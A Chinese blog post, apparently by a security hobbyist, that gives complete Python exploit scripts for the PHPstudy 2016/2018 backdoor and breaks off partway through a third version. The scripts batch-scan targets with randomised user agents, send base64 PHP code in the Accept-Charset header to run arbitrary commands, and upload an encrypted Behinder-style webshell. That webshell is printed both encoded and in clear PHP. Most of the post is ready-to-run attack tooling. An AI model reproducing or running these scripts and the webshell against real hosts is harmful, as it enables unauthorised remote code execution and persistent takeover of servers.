PHPstudy后门漏洞POC-EXP编写

发表于 | 分类于
字数统计: 5,367 | 阅读时长 ≈ 31

PHPstudy后门漏洞POC-EXP编写

phpstudy后门事件过去有一段时间了,漏洞也已经复现了;网上有好多检测的POC,为什么要自己写呢,因为好久没有写代码了,通过这个漏洞巩固一下code,代码国庆前写了一半,被各种事情耽搁,今天补写完整。这次写代码使用面向对象以及参数化编写,就漏洞本身来说,这种方式很麻烦,但是为了毕设的代码量练习(小声BB)。脚本支持PHPstudy2018和2016后门漏洞的检测、利用以及直接上传shell。

代码 and 效果

批量检测POC

支持自定义输入目标文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
'''
@Description: 
@Author: demos
@Github: https://github.com/demossl
'''

import requests
import random
import threading
import threadpool
import sys
import base64
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT=15

def check(url):
    payload = "phpinfo();"
    payload = base64.b64encode(payload.encode('utf-8'))
    headers = {}
    headers['User-Agent'] = random.choice(USER_AGENTS)
    headers['Accept-Encoding'] = 'gzip,deflate'
    headers['Accept-Charset'] = payload
    try:
        result = requests.get(url,headers=headers,timeout=TIME_OUT)
        result.encoding = 'gbk'
        if "phpinfo" in str(result.content):
            print('[+] Target is vulnerable.')
            with open('success.txt','a') as f:
                f.write(url + '\n')
            return True
        else:
            print('[-] Target is NOT vulnerable.')
            return False
    except:
        print('[-] some error!')

def main():
    files = input('please input the files:\n')
    try:
        with open(files,'r') as f:
            lines = f.read().splitlines()
            print(lines)
            task_pool = threadpool.ThreadPool(10)
            requests = threadpool.makeRequests(check,lines)

        for req in requests:
            task_pool.putRequest(req)
            task_pool.wait()
    except KeyboardInterrupt:
        sys.exit()

if __name__ == '__main__':
    main()

带参数检测、利用、传shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
'''
@Description: 
@Author: demos
@Github: https://github.com/demossl
'''

import requests
import argparse
import base64
import random
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT=15

class phpstudy_backdoor_getshell(object):
    def __init__(self,url,command):
        self._url = url
        self._command = command
    
    #访问器 - getter()方法
    @property
    def url(self):
        return self._url
    
    @property
    def command(self):
        return self._command
    
    #修改器 - setter()方法
    @url.setter
    def url(self,url):
        self._url = url
    
    @command.setter
    def command(self,command):
        self._command = command

    def check_Target(self):
        poc = {
            "Accept-Charset": "cGhwaW5mbygpOw==",
            "Accept-Encoding": "gzip,deflate"
        }
        try:
            PocRequest = requests.get(self._url,headers=poc,timeout=TIME_OUT)
            if "phpinfo" in str(PocRequest.content):
                print('[+] Target is vulnerable.')
                return True
            else:
                print('[-] Target is NOT vulnerable.')
                return False
        except:
            print('[-] Looks Like Something Wrong.')
    
    def exploit(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = self._command
        try:
            response = requests.get(self._url,headers=headers)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Command Execute Successful.')
                print(response.text)
            else:
                 print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except:
            print('[-] Looks Like Something Wrong.\n')
        
    def upload_shell_2018(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vUEhQVHV0b3JpYWwvV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='

        try:
            response = requests.get(self._url,headers=headers)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0],self._url.split('/')[2]))
            else:
                 print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except:
            print('[-] Looks Like Something Wrong.\n')
    
    def upload_shell_2016(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='
        try:
            response = requests.get(self._url,headers=headers)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0],self._url.split('/')[2]))
            else:
                 print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except:
            print('[-] Looks Like Something Wrong.\n')
    

def main():

    parse = argparse.ArgumentParser(description='EXP for phpstudy_backdoor.')
    parse.usage="""phpstudy_backdoor_getshell.py [-h] [-u URL] [-c ...]

       example: python3 phpstudy_backdoor_getshell.py -u http://192.168.1.103/index.php -c 'system(\\"whoami\\");'

       使用反斜杠和单双引号防止转义的问题,并解决argparse下以空格解析参数不能当做一个字符串的问题
    """
    parse.add_argument('-u','--url',help='The Target Url')
    parse.add_argument('-c','--command', nargs=argparse.REMAINDER,help='Please input the exploit command')
    parse.add_argument('-w8','--webshell_8',action='store_true',help='upload a Behinder webshell for phpstudy2018')
    parse.add_argument('-w6','--webshell_6',action='store_true',help='upload a Behinder webshell for phpstudy2016')
    args = parse.parse_args()

    x = phpstudy_backdoor_getshell('','')
    if len(sys.argv) < 2:
        print(parse.print_help())
    elif len(sys.argv) < 4 and len(sys.argv) > 2:
        if args.url:
            x.url = args.url
            x.check_Target()
        else:
            print('[-] some error!')
    elif len(sys.argv) >= 4:
        if args.url and args.command:
            commands = '' 
            for cmd in args.command:
                commands += cmd + ' '
            command = base64.b64encode(commands.encode('utf-8'))
            x.url = args.url
            x.command = command
            x.exploit()
        elif args.url and args.webshell_8:
            x.url = args.url
            x.upload_shell_2018()
        elif args.url and args.webshell_6:
            x.url = args.url
            x.upload_shell_2016()
        else:
            print('[-] some error!')

if __name__ == '__main__':
    main()

phpstudy 2018

phpstudy 2016

唯一有变化的就是上传shell的时候,根路径和2018不一样,路径修改如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
file_put_contents('./WWW/about.php', '<?php
@error_reporting(0);
session_start();
if (isset($_GET["pass"]))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION["k"]=$key;
    print $key;
}
else
{
    $key=$_SESSION["k"];
	$post=file_get_contents("php://input");
	if(!extension_loaded("openssl"))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode("|",$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>');

不带参数检测、利用、传shell

和带参数的效果一样,就不放图了,不同的是执行命令传shell时没有解析参数时被转义的问题了

code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
'''
@Description: 
@Author: demos
@Github: https://github.com/demossl
'''

import requests
import base64
import random
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
TIME_OUT=15

class phpstudy_backdoor_getshell(object):
    def __init__(self,url,command):
        self._url = url
        self._command = command
    
    #访问器 - getter()方法
    @property
    def url(self):
        return self._url
    
    @property
    def command(self):
        return self._command
    
    #修改器 - setter()方法
    @url.setter
    def url(self,url):
        self._url = url
    
    @command.setter
    def command(self,command):
        self._command = command

    def check_Target(self):
        poc = {
            "Accept-Charset": "cGhwaW5mbygpOw==",
            "Accept-Encoding": "gzip,deflate"
        }
        try:
            PocRequest = requests.get(self._url,headers=poc,timeout=TIME_OUT)
            if "phpinfo" in str(PocRequest.content):
                print('[+] Target is vulnerable.')
                return True
            else:
                print('[-] Target is NOT vulnerable.')
                return False
        except:
            print('[-] Looks Like Something Wrong.')
    
    def exploit(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
